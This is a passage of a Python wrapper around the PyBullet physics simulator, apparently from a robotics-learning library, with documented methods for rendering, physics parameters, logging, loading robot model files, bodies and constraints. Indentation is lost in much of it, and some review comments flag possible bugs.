                        return img[:, :, :3]  # drop the alpha channel
                    return img
        else:  # currently rendering
            # NOTE(review): this branch does not check `enable`, so calling render(enable=True)
            # while already rendering would also tear down the GUI — confirm intended.
            if mode == 'human':
                # self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_RENDERING, 0)
                # switching GUI -> DIRECT: same save / reconnect / restore dance as above
                if self.connection_mode == pybullet.GUI:
                    # save the state of the simulator
                    filename = 'PYROBOLEARN_RENDERING_STATE.bullet'
                    self.save(filename=filename)

                    # save main camera configuration (for later re-enabling of the GUI)
                    self._camera = self.get_debug_visualizer()[-4:]

                    # change the connection mode (reconnects and replays the history)
                    self.connection_mode = pybullet.DIRECT
                    self.__init(self.connection_mode)

                    # load the state of the world in the simulator, then drop the temp file
                    self.load(filename)
                    os.remove(filename)

        # set the render variable (useful when calling the method `is_rendering`)
        self._render = enable
def get_time_step(self):
"""Get the time step in the simulator.
Returns:
float: time step in the simulator
"""
return self.get_physics_properties()['fixed_time_step']
def set_time_step(self, time_step):
"""Set the specified time step in the simulator.
"Warning: in many cases it is best to leave the timeStep to default, which is 240Hz. Several parameters are
tuned with this value in mind. For example the number of solver iterations and the error reduction parameters
(erp) for contact, friction and non-contact joints are related to the time step. If you change the time step,
you may need to re-tune those values accordingly, especially the erp values.
You can set the physics engine timestep that is used when calling 'stepSimulation'. It is best to only call
this method at the start of a simulation. Don't change this time step regularly. setTimeStep can also be
achieved using the new setPhysicsEngineParameter API." [1]
Args:
time_step (float): Each time you call 'step' the time step will proceed with 'time_step'.
"""
# self.history.append(('set_time_step', {'time_step': time_step}))
self.dt = time_step
self.sim.setTimeStep(timeStep=time_step)
def set_real_time(self, enable=True):
"""Enable/disable real time in the simulator.
"By default, the physics server will not step the simulation, unless you explicitly send a 'stepSimulation'
command. This way you can maintain control determinism of the simulation. It is possible to run the simulation
in real-time by letting the physics server automatically step the simulation according to its real-time-clock
(RTC) using the setRealTimeSimulation command. If you enable the real-time simulation, you don't need to call
'stepSimulation'.
Note that setRealTimeSimulation has no effect in DIRECT mode: in DIRECT mode the physics server and client
happen in the same thread and you trigger every command. In GUI mode and in Virtual Reality mode, and TCP/UDP
mode, the physics server runs in a separate thread from the client (PyBullet), and setRealTimeSimulation
allows the physicsserver thread to add additional calls to stepSimulation." [1]
Args:
enable (bool): If True, it will enable the real-time simulation. If False, it will disable it.
"""
super(Bullet, self).set_real_time(enable=enable)
self.sim.setRealTimeSimulation(enableRealTimeSimulation=int(enable))
def pause(self):
"""Pause the simulator if in real-time."""
self.set_real_time(False)
def unpause(self):
"""Unpause the simulator if in real-time."""
self.set_real_time(True)
def get_physics_properties(self):
"""Get the physics engine parameters.
Returns:
dict: dictionary containing the following tags with their corresponding values: ['gravity',
'num_solver_iterations', 'use_real_time_simulation', 'num_sub_steps', 'fixed_time_step']
"""
d = self.sim.getPhysicsEngineParameters()
properties = dict()
properties['gravity'] = np.asarray([d['gravityAccelerationX'], d['gravityAccelerationY'],
d['gravityAccelerationZ']])
properties['num_solver_iterations'] = d['numSolverIterations']
properties['use_real_time_simulation'] = d['useRealTimeSimulation']
properties['num_sub_steps'] = d['numSubSteps']
properties['fixed_time_step'] = d['fixedTimeStep']
return properties
def set_physics_properties(self, time_step=None, num_solver_iterations=None, use_split_impulse=None,
split_impulse_penetration_threshold=None, num_sub_steps=None,
collision_filter_mode=None, contact_breaking_threshold=None, max_num_cmd_per_1ms=None,
enable_file_caching=None, restitution_velocity_threshold=None, erp=None,
contact_erp=None, friction_erp=None, enable_cone_friction=None,
deterministic_overlapping_pairs=None, solver_residual_threshold=None, **kwargs):
"""Set the physics engine parameters.
Args:
time_step (float): See the warning in the `set_time_step` section. Physics engine timestep in
fraction of seconds, each time you call `step` simulated time will progress this amount.
Same as `set_time_step`. Default to 1./240.
num_solver_iterations (int): Choose the maximum number of constraint solver iterations. If the
`solver_residual_threshold` is reached, the solver may terminate before the `num_solver_iterations`.
Default to 50.
use_split_impulse (int): Advanced feature, only when using maximal coordinates: split the positional
constraint solving and velocity constraint solving in two stages, to prevent huge penetration recovery
forces.
split_impulse_penetration_threshold (float): Related to 'useSplitImpulse': if the penetration for a
particular contact constraint is less than this specified threshold, no split impulse will happen for
that contact.
num_sub_steps (int): Subdivide the physics simulation step further by 'numSubSteps'. This will trade
performance over accuracy.
collision_filter_mode (int): Use 0 for default collision filter: (group A&maskB) AND (groupB&maskA).
Use 1 to switch to the OR collision filter: (group A&maskB) OR (groupB&maskA).
contact_breaking_threshold (float): Contact points with distance exceeding this threshold are not
processed by the LCP solver. In addition, AABBs are extended by this number. Defaults to 0.02 in
Bullet 2.x.
max_num_cmd_per_1ms (int): Experimental: add 1ms sleep if the number of commands executed exceed this
threshold
enable_file_caching (bool): Set to 0 to disable file caching, such as .obj wavefront file loading
restitution_velocity_threshold (float): If relative velocity is below this threshold, restitution will be
zero.
erp (float): constraint error reduction parameter (non-contact, non-friction)
contact_erp (float): contact error reduction parameter
friction_erp (float): friction error reduction parameter (when positional friction anchors are enabled)
enable_cone_friction (bool): Set to False to disable implicit cone friction and use pyramid approximation
(cone is default)
deterministic_overlapping_pairs (bool): Set to True to enable and False to disable sorting of overlapping
pairs (backward compatibility setting).
solver_residual_threshold (float): velocity threshold, if the maximum velocity-level error for each
constraint is below this threshold the solver will terminate (unless the solver hits the
numSolverIterations). Default value is 1e-7.
"""
kwargs = {}
if time_step is not None:
kwargs['fixedTimeStep'] = time_step
if num_solver_iterations is not None:
kwargs['numSolverIterations'] = num_solver_iterations
if use_split_impulse is not None:
kwargs['useSplitImpulse'] = use_split_impulse
if split_impulse_penetration_threshold is not None:
kwargs['splitImpulsePenetrationThreshold'] = split_impulse_penetration_threshold
if num_sub_steps is not None:
kwargs['numSubSteps'] = num_sub_steps
if collision_filter_mode is not None:
kwargs['collisionFilterMode'] = collision_filter_mode
if contact_breaking_threshold is not None:
kwargs['contactBreakingThreshold'] = contact_breaking_threshold
if max_num_cmd_per_1ms is not None:
kwargs['maxNumCmdPer1ms'] = max_num_cmd_per_1ms
if enable_file_caching is not None:
kwargs['enableFileCaching'] = enable_file_caching
if restitution_velocity_threshold is not None:
kwargs['restitutionVelocityThreshold'] = restitution_velocity_threshold
if erp is not None:
kwargs['erp'] = erp
if contact_erp is not None:
kwargs['contactERP'] = contact_erp
if friction_erp is not None:
kwargs['frictionERP'] = friction_erp
if enable_cone_friction is not None:
kwargs['enableConeFriction'] = int(enable_cone_friction)
if deterministic_overlapping_pairs is not None:
kwargs['deterministicOverlappingPairs'] = int(deterministic_overlapping_pairs)
if solver_residual_threshold is not None:
kwargs['solverResidualThreshold'] = solver_residual_threshold
self.sim.setPhysicsEngineParameter(**kwargs)
def start_logging(self, logging_type, filename, object_unique_ids, max_log_dof, body_unique_id_A, body_unique_id_B,
link_index_A, link_index_B, device_type_filter, log_flags):
"""
Start the logging.
Args:
logging_type (int): There are various types of logging implemented.
- STATE_LOGGING_MINITAUR (=0): This will require to load the `quadruped/quadruped.urdf` and object
unique id from the quadruped. It logs the timestamp, IMU roll/pitch/yaw, 8 leg motor positions
(q0-q7), 8 leg motor torques (u0-u7), the forward speed of the torso and mode (unused in
simulation).
- STATE_LOGGING_GENERIC_ROBOT (=1): This will log a log of the data of either all objects or selected
ones (if `object_unique_ids` is provided).
- STATE_LOGGING_VIDEO_MP4 (=3): this will open an MP4 file and start streaming the OpenGL 3D
visualizer pixels to the file using an ffmpeg pipe. It will require ffmpeg installed. You can
also use avconv (default on Ubuntu), just create a symbolic link so that ffmpeg points to avconv.
- STATE_LOGGING_CONTACT_POINTS (=5)
- STATE_LOGGING_VR_CONTROLLERS (=2)
- STATE_LOGGING_PROFILE_TIMINGS (=6): This will dump a timings file in JSON format that can be opened
using Google Chrome about://tracing LOAD.
filename (str): file name (absolute or relative path) to store the log file data
object_unique_ids (list[int]): If left empty, the logger may log every object, otherwise the logger just
logs the objects in the object_unique_ids list.
max_log_dof (int): Maximum number of joint degrees of freedom to log (excluding the base dofs).
This applies to STATE_LOGGING_GENERIC_ROBOT_DATA. Default value is 12. If a robot exceeds the number
of dofs, it won't get logged at all.
body_unique_id_A (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided,only log contact points
involving body_unique_id_A.
body_unique_id_B (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided,only log contact points
involving body_unique_id_B.
link_index_A (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided, only log contact points
involving link_index_A for body_unique_id_A.
link_index_B (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided, only log contact points
involving link_index_B for body_unique_id_B.
device_type_filter (int): deviceTypeFilter allows you to select what VR devices to log:
VR_DEVICE_CONTROLLER (=1), VR_DEVICE_HMD (=2), VR_DEVICE_GENERIC_TRACKER (=4) or any combination of
them. Applies to STATE_LOGGING_VR_CONTROLLERS (=2). Default values is VR_DEVICE_CONTROLLER (=1).
log_flags (int): (upcoming PyBullet 1.3.1). STATE_LOG_JOINT_TORQUES (=3), to log joint torques due to
joint motors.
Returns:
int: non-negative logging unique id.
"""
kwargs = {}
if object_unique_ids is not None:
kwargs['objectUniqueIds'] = object_unique_ids
if max_log_dof is not None:
kwargs['maxLogDof'] = max_log_dof
if body_unique_id_A is not None:
kwargs['bodyUniqueIdA'] = body_unique_id_A
if body_unique_id_B is not None:
kwargs['bodyUniqueIdB'] = body_unique_id_B
if link_index_A is not None:
kwargs['linkIndexA'] = link_index_A
if link_index_B is not None:
kwargs['linkIndexB'] = link_index_B
if device_type_filter is not None:
kwargs['deviceTypeFilter'] = device_type_filter
if log_flags is not None:
kwargs['logFlags'] = log_flags
self.sim.startStateLogging(logging_type, filename, **kwargs)
def stop_logging(self, logger_id):
"""Stop the logging.
Args:
logger_id (int): unique logger id.
"""
self.sim.stopStateLogging(logger_id)
def get_gravity(self):
"""Return the gravity set in the simulator."""
return self.get_physics_properties()['gravity']
def set_gravity(self, gravity=(0, 0, -9.81)):
"""Set the gravity in the simulator with the given acceleration.
By default, there is no gravitational force enabled in the simulator.
Args:
gravity (list, tuple of 3 floats): acceleration in the x, y, z directions.
"""
self.sim.setGravity(gravity[0], gravity[1], gravity[2])
def save(self, filename=None, *args, **kwargs):
"""
Save the state of the simulator.
Args:
filename (None, str): path to file to store the state of the simulator. If None, it will save it in
memory instead of the disk.
Returns:
int / str: unique state id, or filename. This id / filename can be used to load the state.
"""
if filename is None:
return self.sim.saveState()
self.sim.saveBullet(filename)
return filename
def load(self, state, *args, **kwargs):
"""
Load/Restore the simulator to a previous state.
Args:
state (int, str): unique state id, or path to the file containing the state.
"""
if isinstance(state, int):
self.sim.restoreState(stateId=state)
elif isinstance(state, str):
self.sim.restoreState(fileName=state)
def load_plugin(self, plugin_path, name, *args, **kwargs):
"""Load a certain plugin in the simulator.
Few examples can be found at: https://github.com/bulletphysics/bullet3/tree/master/examples/SharedMemory/plugins
Args:
plugin_path (str): path, location on disk where to find the plugin
name (str): postfix name of the plugin that is appended to each API
Returns:
int: unique plugin id. If this id is negative, the plugin is not loaded. Once a plugin is loaded, you can
send commands to the plugin using `execute_plugin_commands`
"""
return self.sim.loadPlugin(plugin_path, name)
def execute_plugin_command(self, plugin_id, *args):
"""Execute the commands on the specified plugin.
Args:
plugin_id (int): unique plugin id.
*args (list): list of argument values to be interpreted by the plugin. One can be a string, while the
others must be integers or float.
"""
kwargs = {}
for arg in args:
if isinstance(arg, str):
kwargs['textArgument'] = arg
elif isinstance(arg, int):
kwargs.setdefault('intArgs', []).append(arg)
elif isinstance(arg, float):
kwargs.setdefault('floatArgs', []).append(arg)
self.sim.executePluginCommand(plugin_id, **kwargs)
def unload_plugin(self, plugin_id, *args, **kwargs):
"""Unload the specified plugin from the simulator.
Args:
plugin_id (int): unique plugin id.
"""
self.sim.unloadPlugin(plugin_id)
######################################
# loading URDFs, SDFs, MJCFs, meshes #
######################################
def _load_urdf(self, filename, position=None, orientation=None, use_maximal_coordinates=None,
use_fixed_base=None, flags=None, scale=None):
"""Load the given URDF file.
The load_urdf will send a command to the physics server to load a physics model from a Universal Robot
Description File (URDF). The URDF file is used by the ROS project (Robot Operating System) to describe robots
and other objects, it was created by the WillowGarage and the Open Source Robotics Foundation (OSRF).
Many robots have public URDF files, you can find a description and tutorial here:
http://wiki.ros.org/urdf/Tutorials
Important note:
most joints (slider, revolute, continuous) have motors enabled by default that prevent free
motion. This is similar to a robot joint with a very high-friction harmonic drive. You should set the joint
motor control mode and target settings using `pybullet.setJointMotorControl2`. See the
`setJointMotorControl2` API for more information.
Warning:
by default, PyBullet will cache some files to speed up loading. You can disable file caching using
`setPhysicsEngineParameter(enableFileCaching=0)`.
Args:
filename (str): a relative or absolute path to the URDF file on the file system of the physics server.
position (np.array[float[3]]): create the base of the object at the specified position in world space
coordinates [x,y,z].
orientation (np.array[float[4]]): create the base of the object at the specified orientation as world
space quaternion [x,y,z,w].
use_maximal_coordinates (int): Experimental. By default, the joints in the URDF file are created using the
reduced coordinate method: the joints are simulated using the Featherstone Articulated Body algorithm
(btMultiBody in Bullet 2.x). The useMaximalCoordinates option will create a 6 degree of freedom rigid
body for each link, and constraints between those rigid bodies are used to model joints.
use_fixed_base (bool): force the base of the loaded object to be static
flags (int): URDF_USE_INERTIA_FROM_FILE (val=2): by default, Bullet recomputed the inertia tensor based on
mass and volume of the collision shape. If you can provide more accurate inertia tensor, use this flag.
URDF_USE_SELF_COLLISION (val=8): by default, Bullet disables self-collision. This flag let's you
enable it.
You can customize the self-collision behavior using the following flags:
* URDF_USE_SELF_COLLISION_EXCLUDE_PARENT (val=16) will discard self-collision between links that
are directly connected (parent and child).
* URDF_USE_SELF_COLLISION_EXCLUDE_ALL_PARENTS (val=32) will discard self-collisions between a
child link and any of its ancestors (parents, parents of parents, up to the base).
* URDF_USE_IMPLICIT_CYLINDER (val=128), will use a smooth implicit cylinder. By default, Bullet
will tessellate the cylinder into a convex hull.
scale (float): scale factor to the URDF model.
Returns:
int (non-negative): unique id associated to the load model.
"""
kwargs = {}
if position is not None:
if isinstance(position, np.ndarray):
position = position.ravel().tolist()
kwargs['basePosition'] = position
if orientation is not None:
if isinstance(orientation, np.ndarray):
orientation = orientation.ravel().tolist()
kwargs['baseOrientation'] = orientation
if use_maximal_coordinates is not None:
kwargs['useMaximalCoordinates'] = use_maximal_coordinates
if use_fixed_base is not None:
kwargs['useFixedBase'] = use_fixed_base
if flags is not None:
kwargs['flags'] = flags
if scale is not None:
kwargs['globalScaling'] = scale
model_id = self.sim.loadURDF(filename, **kwargs)
# if model_id > -1:
# frame = inspect.currentframe()
# args, _, _, values = inspect.getargvalues(frame)
# self.history.append(('load_urdf', {arg: values[arg] for arg in args[1:]}))
return model_id
def load_sdf(self, filename, scaling=1., *args, **kwargs):
"""Load the given SDF file.
The load_sdf command only extracts some essential parts of the SDF related to the robot models and geometry,
and ignores many elements related to cameras, lights and so on.
Args:
filename (str): a relative or absolute path to the SDF file on the file system of the physics server.
scaling (float): scale factor for the object
Returns:
list(int): list of object unique id for each object loaded
"""
return self.sim.loadSDF(filename, globalScaling=scaling)
    def load_mjcf(self, filename, scaling=1., *args, **kwargs):
        """Load the given MJCF file.

        "The load_mjcf command performs basic import of MuJoCo MJCF xml files, used in OpenAI Gym". [1]
        It will load all the objects described in a MJCF file.

        Args:
            filename (str): a relative or absolute path to the MJCF file on the file system of the physics server.
            scaling (float): scale factor for the object. NOTE(review): this argument is currently NOT forwarded
                to the backend call below, so it has no effect — confirm whether the backend's `loadMJCF`
                supports a scaling option at all.

        Returns:
            list(int): list of object unique id for each object loaded
        """
        return self.sim.loadMJCF(filename)
    def load_mesh(self, filename, position, orientation=(0, 0, 0, 1), mass=1., scale=(1., 1., 1.),
                  color=None, with_collision=True, flags=None, *args, **kwargs):
        """
        Load a mesh in the world (only available in the simulator).

        Warnings (see https://github.com/bulletphysics/bullet3/issues/1813):
        - it only accepts wavefront obj files
        - wavefront obj files can have at most 1 texture
        - there is a limited pre-allocated memory for visual meshes

        Args:
            filename (str): path to file for the mesh. Currently, only Wavefront .obj. It will create convex hulls
                for each object (marked as 'o') in the .obj file.
            position (list[float[3]], np.array[float[3]]): position of the mesh in the Cartesian world space (in meters)
            orientation (list[float[4]], np.array[float[4]]): orientation of the mesh using quaternion [x,y,z,w].
            mass (float): mass of the mesh (in kg). If mass = 0, it won't move even if there is a collision.
            scale (list[float[3]], np.array[float[3]]): scale the mesh in the (x,y,z) directions
            color (list[int[4]], None): color of the mesh for red, green, blue, and alpha, each in range [0,1].
            with_collision (bool): If True, it will also create the collision mesh, and not only a visual mesh.
            flags (int, None): if flag = `sim.GEOM_FORCE_CONCAVE_TRIMESH` (=1), this will create a concave static
                triangle mesh. This should not be used with dynamic/moving objects, only for static (mass=0) terrain.

        Returns:
            int: unique id of the mesh in the world
        """
        # NOTE: the local `kwargs` dict deliberately shadows the **kwargs parameter; the caller's extra
        # keyword arguments are discarded by this method.
        kwargs = {}
        if flags is not None:
            # NOTE(review): `flags` is forwarded to BOTH createCollisionShape and createVisualShape below;
            # the docstring only describes the collision-shape semantics — confirm the visual-shape effect.
            kwargs['flags'] = flags
        # create collision shape if specified
        collision_shape = None
        if with_collision:
            collision_shape = self.sim.createCollisionShape(pybullet.GEOM_MESH, fileName=filename, meshScale=scale,
                                                            **kwargs)
        # the color only applies to the visual shape, so it is added after the collision shape was created
        if color is not None:
            kwargs['rgbaColor'] = color
        # create visual shape
        visual_shape = self.sim.createVisualShape(pybullet.GEOM_MESH, fileName=filename, meshScale=scale, **kwargs)
        # create body
        if with_collision:
            mesh = self.sim.createMultiBody(baseMass=mass,
                                            baseCollisionShapeIndex=collision_shape,
                                            baseVisualShapeIndex=visual_shape,
                                            basePosition=position,
                                            baseOrientation=orientation)
        else:
            mesh = self.sim.createMultiBody(baseMass=mass,
                                            baseVisualShapeIndex=visual_shape,
                                            basePosition=position,
                                            baseOrientation=orientation)
        return mesh
@staticmethod
def _get_3d_models(extension, fullpath=False):
"""Return the list of 3d models (urdf, sdf, mjcf/xml, obj).
Args:
extension (str): extension of the 3D models (urdf, sdf, mjcf/xml, obj).
fullpath (bool): If True, it will return the full path to the 3D objects. If False, it will just return
the name of the files (without the extension).
"""
extension = '.' + extension
path = pybullet_data.getDataPath()
results = []
for dir_path, dir_names, filenames in os.walk(path):
for filename in filenames:
if os.path.splitext(filename)[1] == extension:
if fullpath:
results.append(os.path.join(dir_path, filename)) # append the fullpath
else:
results.append(filename[:-len(extension)]) # remove extension
return results
@staticmethod
def get_available_sdfs(fullpath=False):
"""Return the list of available SDFs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the SDFs. If False, it will just return the
name of the SDF files (without the extension).
"""
return Bullet._get_3d_models(extension='sdf', fullpath=fullpath)
@staticmethod
def get_available_urdfs(fullpath=False):
"""Return the list of available URDFs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the URDFs. If False, it will just return the
name of the URDF files (without the extension).
"""
return Bullet._get_3d_models(extension='urdf', fullpath=fullpath)
@staticmethod
def get_available_mjcfs(fullpath=False):
"""Return the list of available MJCFs (=XMLs) from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the MJCFs/XMLs. If False, it will just return
the name of the MJCF/XML files (without the extension).
"""
results1 = Bullet._get_3d_models(extension='mjcf', fullpath=fullpath)
results2 = Bullet._get_3d_models(extension='xml', fullpath=fullpath)
return results1 + results2
@staticmethod
def get_available_objs(fullpath=False):
"""Return the list of available OBJs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the OBJs. If False, it will just return the
name of the OBJ files (without the extension).
"""
return Bullet._get_3d_models(extension='obj', fullpath=fullpath)
##########
# Bodies #
##########
def load_floor(self, dimension=20):
"""Load a floor in the simulator.
Args:
dimension (float): dimension of the floor.
Returns:
int: non-negative unique id for the floor, or -1 for failure.
"""
return self.load_urdf('plane.urdf', position=[0., 0., 0.], use_fixed_base=True, scale=dimension/20.)
# TODO: add the other arguments
def create_body(self, visual_shape_id=-1, collision_shape_id=-1, mass=0., position=(0., 0., 0.),
orientation=(0., 0., 0., 1.), *args, **kwargs):
"""Create a body in the simulator.
Args:
visual_shape_id (int): unique id from createVisualShape or -1. You can reuse the visual shape (instancing)
collision_shape_id (int): unique id from createCollisionShape or -1. You can re-use the collision shape
for multiple multibodies (instancing)
mass (float): mass of the base, in kg (if using SI units)
position (np.array[float[3]]): Cartesian world position of the base
orientation (np.array[float[4]]): Orientation of base as quaternion [x,y,z,w]
Returns:
int: non-negative unique id or -1 for failure.
"""
if isinstance(position, np.ndarray):
position = position.ravel().tolist()
if isinstance(orientation, np.ndarray):
orientation = orientation.ravel().tolist()
return self.sim.createMultiBody(baseMass=mass, baseCollisionShapeIndex=collision_shape_id,
baseVisualShapeIndex=visual_shape_id, basePosition=position,
baseOrientation=orientation, **kwargs)
def remove_body(self, body_id):
"""Remove a particular body in the simulator.
Args:
body_id (int): unique body id.
"""
self.sim.removeBody(body_id)
def num_bodies(self):
"""Return the number of bodies present in the simulator.
Returns:
int: number of bodies
"""
return self.sim.getNumBodies()
def get_body_info(self, body_id):
"""Get the specified body information.
Specifically, it returns the base name extracted from the URDF, SDF, MJCF, or other file.
Args:
body_id (int): unique body id.
Returns:
str: base name
"""
name = self.sim.getBodyInfo(body_id)
name = name if isinstance(name, str) else name.decode("utf-8")
return name
def get_body_id(self, index):
"""
Get the body id associated to the index which is between 0 and `num_bodies()`.
Args:
index (int): index between [0, `num_bodies()`]
Returns:
int: unique body id.
"""
return self.sim.getBodyUniqueId(index)
###############
# constraints #
###############
def create_constraint(self, parent_body_id, parent_link_id, child_body_id, child_link_id, joint_type,
joint_axis, parent_frame_position, child_frame_position,
parent_frame_orientation=(0., 0., 0., 1.), child_frame_orientation=(0., 0., 0., 1.),
*args, **kwargs):
"""
Create a constraint.
"URDF, SDF and MJCF specify articulated bodies as a tree-structures without loops. The 'createConstraint'
allows you to connect specific links of bodies to close those loops. In addition, you can create arbitrary
constraints between objects, and between an object and a specific world frame.
It can also be used to control the motion of physics objects, driven by animated frames, such as a VR
controller. It is better to use constraints, instead of setting the position or velocity directly for
such purpose, since those constraints are solved together with other dynamics constraints." [1]
Args:
parent_body_id (int): parent body unique id
parent_link_id (int): parent link index (or -1 for the base)
child_body_id (int): child body unique id, or -1 for no body (specify a non-dynamic child frame in world
coordinates)
child_link_id (int): child link index, or -1 for the base
joint_type (int): joint type: JOINT_PRISMATIC (=1), JOINT_FIXED (=4), JOINT_POINT2POINT (=5),
JOINT_GEAR (=6). If the JOINT_FIXED is set, the child body's link will not move with respect to the
parent body's link. If the JOINT_PRISMATIC is set, the child body's link will only be able to move
along the given joint axis with respect to the parent body's link. If the JOINT_POINT2POINT is set
(which should really be called spherical), the child body's link will be able to rotate along the 3
axis while maintaining the given position relative to the parent body's link. If the JOINT_GEAR can be
set between two links of the same body.
joint_axis (np.array[float[3]]): joint axis, in child link frame
parent_frame_position (np.array[float[3]]): position of the joint frame relative to parent CoM frame.
child_frame_position (np.array[float[3]]): position of the joint frame relative to a given child CoM frame
(or world origin if no child specified)
parent_frame_orientation (np.array[float[4]]): the orientation of the joint frame relative to parent CoM
coordinate frame
child_frame_orientation (np.array[float[4]]): the orientation of the joint frame relative to the child CoM
coordinate frame (or world origin frame if no child specified)
Examples:
- `pybullet/examples/quadruped.py`
- `pybullet/examples/constraint.py`
Returns:
int: constraint unique id.
"""
return self.sim.createConstraint(parent_body_id, parent_link_id, child_body_id, child_link_id, joint_type,
joint_axis, parent_frame_position, child_frame_position,
parent_frame_orientation, child_frame_orientation)
def remove_constraint(self, constraint_id):
"""
Remove the specified constraint.
Args:
constraint_id (int): constraint unique id.
"""
self.sim.removeConstraint(constraint_id)
def change_constraint(self, constraint_id, child_joint_pivot=None, child_frame_orientation=None, max_force=None,
gear_ratio=None, gear_auxiliary_link=None, relative_position_target=None, erp=None, *args,
**kwargs):
"""
Change the parameters of an existing constraint.
Args:
constraint_id (int): constraint unique id.
child_joint_pivot (np.array[float[3]]): updated position of the joint frame relative to a given child CoM
frame (or world origin if no child specified)
child_frame_orientation (np.array[float[4]]): updated child frame orientation as quaternion [x,y,z,w]
max_force (float): maximum force that constraint can apply
gear_ratio (float): the ratio between the rates at which the two gears rotate
gear_auxiliary_link (int): In some cases, such as a differential drive, a third (auxilary) link is used as
reference pose. See `racecar_differential.py`
relative_position_target (float): the relative position target offset between two gears
erp (float): constraint error reduction parameter
"""
kwargs = {}
if child_joint_pivot is not None:
kwargs['jointChildPivot'] = child_joint_pivot
if child_frame_orientation is not None:
kwargs['jointChildFrameOrientation'] = child_frame_orientation
if max_force is not None:
kwargs['maxForce'] = max_force
if gear_ratio is not None:
kwargs['gearRatio'] = gear_ratio
if gear_auxiliary_link is not None:
kwargs['gearAuxLink'] = gear_auxiliary_link
if relative_position_target is not None:
kwargs['relativePositionTarget'] = relative_position_target
if erp is not None:
kwargs['erp'] = erp
self.sim.changeConstraint(constraint_id, **kwargs)
def num_constraints(self):
"""
Get the number of constraints created.
Returns:
int: number of constraints created.
"""
return self.sim.getNumConstraints()
def get_constraint_id(self, index):
"""
Get the constraint unique id associated with the index which is between 0 and `num_constraints()`.
Args:
index (int): index between [0, `num_constraints()`]
Returns:
int: constraint unique id.
"""
return self.sim.getConstraintUniqueId(index)
def get_constraint_info(self, constraint_id):
"""
Get information about the given constaint id.
Args:
constraint_id (int): constraint unique id.
Returns:
int: parent_body_id
int: parent_joint_id (if -1, it is the base)
int: child_body_id (if -1, no body; specify a non-dynamic child frame in world coordinates)
int: child_link_id (if -1, it is the base)
int: constraint/joint type
np.array[float[3]]: joint axis
np.array[float[3]]: joint pivot (position) in parent CoM frame
np.array[float[3]]: joint pivot (position) in specified child CoM frame (or world frame if no specified
child)
np.array[float[4]]: joint frame orientation relative to parent CoM coordinate frame
np.array[float[4]]: joint frame orientation relative to child CoM frame (or world frame if no specified
child)
float: maximum force that constraint can apply
"""
return self.sim.getConstraintInfo(constraint_id)
def get_constraint_state(self, constraint_id):
"""
Get the state of the given constraint.
Args:
constraint_id (int): constraint unique id.
Returns:
list[float[D]]: applied constraint forces. Its dimension is the degrees of freedom that are affected by
the constraint (a fixed constraint affects 6 DoF for example)
"""
return self.sim.getConstraintState(constraint_id)
###########
# objects #
###########
def get_mass(self, body_id):
"""
Return the total mass of the robot (=sum of all mass links).
Args:
body_id (int): unique object id, as returned from `load_urdf`.
Returns:
float: total mass of the robot [kg]
"""
return np.sum(self.get_link_masses(body_id, [-1] + list(range(self.num_links(body_id)))))
def get_base_mass(self, body_id):
"""Return the base mass of the robot.
Args:
body_id (int): unique object id.
"""
return self.get_link_masses(body_id, -1)
def get_base_name(self, body_id):
"""
Return the base name.
Args:
body_id (int): unique object id.
Returns:
str: base name
"""
name = self.sim.getBodyInfo(body_id)[0]
name = name if isinstance(name, str) else name.decode("utf-8")
return name
def get_center_of_mass_position(self, body_id, link_ids=None):
"""
Return the center of mass position.
Args:
body_id (int): unique body id.
link_ids (list[int]): link ids associated with the given body id. If None, it will take all the links
of the specified body.
Returns:
np.array[float[3]]: center of mass position in the Cartesian world coordinates
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
pos = self.get_link_world_positions(body_id, link_ids)
mass = self.get_link_masses(body_id, link_ids)
com = np.sum(pos.T * mass, axis=1) / np.sum(mass)
return com
def get_center_of_mass_velocity(self, body_id, link_ids=None):
"""
Return the center of mass linear velocity.
Args:
body_id (int): unique body id.
link_ids (list[int]): link ids associated with the given body id. If None, it will take all the links
of the specified body.
Returns:
np.array[float[3]]: center of mass linear velocity.
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
vel = self.get_link_world_linear_velocities(body_id, link_ids)
mass = self.get_link_masses(body_id, link_ids)
com = np.sum(vel.T * mass, axis=1) / np.sum(mass)
return com
def get_linear_momentum(self, body_id, link_ids=None):
"""
Return the total linear momentum in the world space.
Returns:
np.array[float[3]]: linear momentum
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
mass = self.get_link_masses(body_id, link_ids)
vel = self.get_link_world_linear_velocities(body_id, link_ids)
return np.sum(vel.T * mass, axis=1)
def get_base_pose(self, body_id):
"""
Get the current position and orientation of the base (or root link) of the body in Cartesian world coordinates.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: base position
np.array[float[4]]: base orientation (quaternion [x,y,z,w])
"""
pos, orientation = self.sim.getBasePositionAndOrientation(body_id)
return np.asarray(pos), np.asarray(orientation)
def get_base_position(self, body_id):
"""
Return the base position of the specified body.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: base position.
"""
return self.get_base_pose(body_id)[0]
def get_base_orientation(self, body_id):
"""
Get the base orientation of the specified body.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[4]]: base orientation in the form of a quaternion (x,y,z,w)
"""
return self.get_base_pose(body_id)[1]
def reset_base_pose(self, body_id, position, orientation):
"""
Reset the base position and orientation of the specified object id.
"It is best only to do this at the start, and not during a running simulation, since the command will override
the effect of all physics simulation. The linear and angular velocity is set to zero. You can use
`reset_base_velocity` to reset to a non-zero linear and/or angular velocity." [1]
Args:
body_id (int): unique object id.
position (np.array[float[3]]): new base position.
orientation (np.array[float[4]]): new base orientation (expressed as a quaternion [x,y,z,w])
"""
self.sim.resetBasePositionAndOrientation(body_id, position, orientation)
def reset_base_position(self, body_id, position):
"""
Reset the base position of the specified body/object id while preserving its orientation.
Args:
body_id (int): unique object id.
position (np.array[float[3]]): new base position.
"""
orientation = self.get_base_orientation(body_id)
